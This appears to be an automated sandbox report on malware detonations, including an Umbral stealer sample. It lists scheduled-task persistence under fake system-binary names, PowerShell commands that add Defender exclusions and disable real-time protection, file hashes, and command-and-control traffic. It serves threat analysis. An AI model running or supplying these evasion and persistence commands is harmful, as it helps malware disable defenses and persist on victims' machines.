schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Sidebar\fr-FR\smss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\fr-FR\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Sidebar\fr-FR\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "192f0f1221e376146e725a4d23ee69a01" /sc MINUTE /mo 12 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\192f0f1221e376146e725a4d23ee69a0.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "192f0f1221e376146e725a4d23ee69a0" /sc ONLOGON /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\192f0f1221e376146e725a4d23ee69a0.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "192f0f1221e376146e725a4d23ee69a01" /sc MINUTE /mo 12 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\192f0f1221e376146e725a4d23ee69a0.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\spoolsv.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\MSOCache\All Users\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "192f0f1221e376146e725a4d23ee69a01" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\192f0f1221e376146e725a4d23ee69a0.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "192f0f1221e376146e725a4d23ee69a0" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\192f0f1221e376146e725a4d23ee69a0.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "192f0f1221e376146e725a4d23ee69a01" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\192f0f1221e376146e725a4d23ee69a0.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\spoolsv.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Templates\System.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\winlogon.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\fr-FR\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\smss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Sidebar\fr-FR\smss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\192f0f1221e376146e725a4d23ee69a0.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\spoolsv.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\192f0f1221e376146e725a4d23ee69a0.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe'
C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe
"C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\02e82330-10e4-4d69-9ac7-ae20e57401a6.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\000a36eb-8f05-429d-855f-89b30d664d3d.vbs"
C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe
"C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3ad17da4-5d28-4cd3-a423-197244fd6b37.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\84943063-e335-42af-b71f-b023053a5e6b.vbs"
C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe
"C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0b4bf8ee-f19c-4b34-b84f-556cf4df2999.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0f95aca8-b736-4c7b-86e9-e0f13a37da05.vbs"
C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe
"C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3e482dfe-79c2-45b2-844d-0acd5076dd8a.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a2e8eb5e-cd31-40f9-81bc-38767d6b7880.vbs"
C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe
"C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\071b134e-531d-47df-b1b7-f33365a13a85.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cc235d5d-142a-4fc2-a493-2f9f613403bc.vbs"
C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe
"C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3b3cfbd5-f0bf-4992-ad0e-9d99381e32ea.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\773797a4-d74c-4eff-bdd0-ddc240bd6cca.vbs"
C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe
"C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9aa2486c-af8f-4add-bc44-5514dd129b38.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e97fc3e9-eb6c-4165-a7b0-564e1470c976.vbs"
C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe
"C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\35759043-3256-4dbb-a295-53a22ceb79d6.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\95a67844-932d-4545-8d20-5741a0100290.vbs"
Network
| Country | Destination | Domain | Proto |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp | |
| DE | 46.3.197.86:80 | tcp |
Files
memory/2280-0-0x000007FEF5233000-0x000007FEF5234000-memory.dmp
memory/2280-1-0x0000000000F80000-0x000000000116A000-memory.dmp
memory/2280-2-0x000007FEF5230000-0x000007FEF5C1C000-memory.dmp
memory/2280-3-0x0000000000530000-0x000000000054C000-memory.dmp
memory/2280-7-0x0000000000BA0000-0x0000000000BAA000-memory.dmp
memory/2280-6-0x0000000000560000-0x0000000000576000-memory.dmp
memory/2280-5-0x0000000000550000-0x0000000000560000-memory.dmp
memory/2280-4-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2280-12-0x0000000000C50000-0x0000000000C62000-memory.dmp
memory/2280-10-0x0000000000C40000-0x0000000000C48000-memory.dmp
memory/2280-9-0x0000000000BB0000-0x0000000000BBC000-memory.dmp
memory/2280-13-0x0000000000E00000-0x0000000000E0C000-memory.dmp
memory/2280-15-0x000000001AE30000-0x000000001AE3E000-memory.dmp
memory/2280-18-0x000000001AEE0000-0x000000001AEEC000-memory.dmp
memory/2280-17-0x000000001AE50000-0x000000001AE5C000-memory.dmp
memory/2280-16-0x000000001AE40000-0x000000001AE48000-memory.dmp
memory/2280-14-0x000000001AE20000-0x000000001AE2A000-memory.dmp
memory/2280-8-0x000000001ADD0000-0x000000001AE26000-memory.dmp
C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\smss.exe
| MD5 | 192f0f1221e376146e725a4d23ee69a0 |
| SHA1 | 9500b9672eac1b1b2dee0e81f8b8efbb6d0d90ff |
| SHA256 | 019443010d028a6d5828afc530b1bd568e536afe32e715fe6a771f3ee1a3cc9d |
| SHA512 | daab36e062d27fd7a62607eb16a6013523fafabb31618e681feeae2fc92eb93d43c1f1a8051849aee4839d8b025ccf7227f5081847fd7b2c78e6f233f8d25a54 |
C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\spoolsv.exe
| MD5 | 1d34a4062408c41685f98d3552a8ac2d |
| SHA1 | 3fcc24ee7da60f71b563cf360a395178274d83fe |
| SHA256 | fde44434ca762a577c4f2840b3029eed88e91c41ec6ef2ae28473a6606035402 |
| SHA512 | 50b75e117397301f3acc1ae2f362cec75d061c45789011c57e0b3e2a8bbd4ce673f5bc081df3d64d589dbfb7ab95a297dd1a04804f39adc2c8b579f3e56018fa |
C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\smss.exe
| MD5 | c525e1d9ff51e646742e7c6403469529 |
| SHA1 | 28e5050a7657af750630854b5aced9c905ab7a2c |
| SHA256 | ba26c630cffe91736feb9c17258770bc9416828b8a3fd3feb30f2016aba1d6e1 |
| SHA512 | 9d62218b92b454620f654d305cddc86c04c978c60eb512735b56556928e1cacc270c7cea0065a09eee4a3e72a437f66c1c14d3f29788a38369d966803f80e5db |
C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\192f0f1221e376146e725a4d23ee69a0.exe
| MD5 | 4082314399ef9432f746d09ddeba93bd |
| SHA1 | 4365fa6112e0e6b5fb3b7c6ab1c08b79c8fa721b |
| SHA256 | ef58eeb4cf44148e62370990d952b04a8749f27bf1338a6cae4e91ea99049040 |
| SHA512 | d4c378d7500dd5bea61766f89cc699113cffdf69ad7541889c76be267e04da42eb7e9ba411b8be385ea2d1d74fa3c3468bfbe91f95b94751494810752cbb574d |
memory/1736-196-0x0000000002910000-0x0000000002918000-memory.dmp
memory/1740-195-0x0000000000980000-0x0000000000B6A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bb00fa18531eb39ea0f379e3ac0b5713 |
| SHA1 | 35806a59a3cfb75a8efa321b7d077e5702b08e44 |
| SHA256 | 54b5b1d9a6fd1db968e4792e52059e8a3cb682e99a0a467d0e0b3cd4dd507ec3 |
| SHA512 | 654fdbc7d0d6aed33a075fe422362f198d43735da004245bdf80591545dbea9d830bb092014c14cf8b7d84151a17e8bd92c15de216747611b431e41d84d713ef |
memory/2128-194-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
memory/2280-234-0x000007FEF5230000-0x000007FEF5C1C000-memory.dmp
memory/1740-239-0x0000000000560000-0x0000000000572000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\000a36eb-8f05-429d-855f-89b30d664d3d.vbs
| MD5 | b76eb07a43724a1abd0f255b4a18ae54 |
| SHA1 | d432e154aaed126f85cbb0f9a6fb9e86ea6690b8 |
| SHA256 | 0dc17a8271ff4e59c2b9f03b0c92727cbf40428628b7779e3a9c2018dee2bd38 |
| SHA512 | a77412116a45e3498d0db7f008f7220777844b155fff6ebd946c07f155a553013c7b58e510cfbf9b2d4a17d565c94108e722ccbb5b47df09bdb91c6b3880629d |
C:\Users\Admin\AppData\Local\Temp\02e82330-10e4-4d69-9ac7-ae20e57401a6.vbs
| MD5 | 0d0d3de3358243b3f86178f207867bd4 |
| SHA1 | fad78c801830da5f828fecee992279f1186a0a60 |
| SHA256 | 63dc8e286131d64c43bb997a1f6285eaca66946cf31a213ea6166cfd1b53337a |
| SHA512 | 343c795fd3260ae434f80ac894c32139d25ab043967a0f6369a2481e1ec72f3647d28151ea762e6a0950eb6630fa8c9b592bebf3bcada62adb1ffd0925d85193 |
memory/1512-250-0x0000000000BF0000-0x0000000000DDA000-memory.dmp
memory/1512-251-0x0000000000BE0000-0x0000000000BF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\3ad17da4-5d28-4cd3-a423-197244fd6b37.vbs
| MD5 | b6cc3157632624ad3ec1b198aea0db7d |
| SHA1 | 44ca5d291f8ad3e5367bc97deb3ed05b30101deb |
| SHA256 | 714e73935e73cc28c6ee37614b3c35c64d534b97336a88849e88f12a29e1af09 |
| SHA512 | a80f9c7664e9e11dabfd07a10bda576f9dbb6c4aa6bd2e405517d8c0fb8efbf105cf8622aefe42b9238f9df11189e1e1c9d6fc9016cf4617b79088389aa192ab |
memory/3036-263-0x0000000000250000-0x000000000043A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\0b4bf8ee-f19c-4b34-b84f-556cf4df2999.vbs
| MD5 | 4d27bcab7652be26e04e6c20efba3b06 |
| SHA1 | befd13c8a1e6bef14cba0c5132d55a2061324700 |
| SHA256 | ff0a44b592cfa886108b18a0bd313baa2af59a65909bb855d864fab6edefe7db |
| SHA512 | ad39822d324cc645db71b92af81c770dd86e56f2b8d900f058fcf68e0cd86ba9a07369d48b2e6876865f9a9f6a7ce70d8831e533400fd994b6fe798f0544f374 |
memory/2216-275-0x0000000001040000-0x000000000122A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\3e482dfe-79c2-45b2-844d-0acd5076dd8a.vbs
| MD5 | 6e9b538a9e02c38aa2477eb65f3b2720 |
| SHA1 | a0620edf4f3a4be162ffde2d998d690450119e52 |
| SHA256 | 49b595e6a4633b09c8d6fcfa079807333f98ab4ed1a8c08fa3f6f73b28facd23 |
| SHA512 | 102dbe7038494a4979bbc51c1a32eb35363315c69280e521e2b3805e832929f8b2ab47cdecf0ef6c6dd8babbc05070c7a57075e9f8bb46f9068b0d2fefe7680d |
C:\Users\Admin\AppData\Local\Temp\071b134e-531d-47df-b1b7-f33365a13a85.vbs
| MD5 | 1c1fb7e7eaff7a849c91a681e172598f |
| SHA1 | 9c8645b6bf491c9da40f4072758fedcc674317f7 |
| SHA256 | 815bee69e3790c16eee1f79cd0aebfd1935d1d80248664dd0b0d45672719675c |
| SHA512 | a4d37cbafef139cad93add21af4ebe0444b976de41ee498c4ed384627f4d1ce0c8bbe5548318a38ba016edf2456f8b1431d2e1df4507dff5cd0fc1b717dd1569 |
memory/1748-298-0x0000000001190000-0x000000000137A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\3b3cfbd5-f0bf-4992-ad0e-9d99381e32ea.vbs
| MD5 | ad6208c1c901a1458291f59bc3a660d7 |
| SHA1 | 77fcbabbc38d067960f2b8dac95c6c521b34ceb3 |
| SHA256 | 6fc1848997af117e009920bf33929ef8f2ea0e614c83f1f283d3ab2c0b6db012 |
| SHA512 | 08b955647310ce25b8d14f839df80244d21c3eb35c147596dd2bf6cf71691ff0c564eafe2ac47ab72edb118193fb6b404709c6c5b07f502c9c7ce55d0547b58a |
memory/2752-310-0x0000000001250000-0x000000000143A000-memory.dmp
memory/2752-311-0x0000000001240000-0x0000000001252000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9aa2486c-af8f-4add-bc44-5514dd129b38.vbs
| MD5 | 0b0749de7c4301b78b8350e9251fa22e |
| SHA1 | 476e3228368a092a257adac380741417d2bb0d94 |
| SHA256 | afbb0ac0be3b7ae469ef2b2478b3357dd689aec71f913e4f3fe1ba76a2eb67fc |
| SHA512 | be02fb5cc0623819cfe1e73363a6539071407c89e9a1a33542a1109a77e7cae665e0322d188b10fd9074dbdcdf2dff97b525736db8b6961a7c413a23a7908e49 |
C:\Users\Admin\AppData\Local\Temp\35759043-3256-4dbb-a295-53a22ceb79d6.vbs
| MD5 | c2a150fb928ca9efc370146e13a49ff0 |
| SHA1 | cb3b5b1a2c1641466827837f0543c98a52b51146 |
| SHA256 | e279e09607455b6fe7e5210b368a2cbb94f485ca341c4622facd4e86701ccb08 |
| SHA512 | 05f954315dc988ec32e4559a5585ccb7c9559d897b5fef47ae294c40dfec61b88fb07a48789a2289f751fc0d051ff948dff64ff17a47cbe4ef3d02f35eafa8da |
Analysis: behavioral3
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20241010-en
Max time kernel
16s
Max time network
24s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral
Umbral family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\193e069cb0734f2f4107d4c1fbb7f3b22d8783932eaa405bb7a0e52cb86fcfe1.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\193e069cb0734f2f4107d4c1fbb7f3b22d8783932eaa405bb7a0e52cb86fcfe1.exe
"C:\Users\Admin\AppData\Local\Temp\193e069cb0734f2f4107d4c1fbb7f3b22d8783932eaa405bb7a0e52cb86fcfe1.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\193e069cb0734f2f4107d4c1fbb7f3b22d8783932eaa405bb7a0e52cb86fcfe1.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
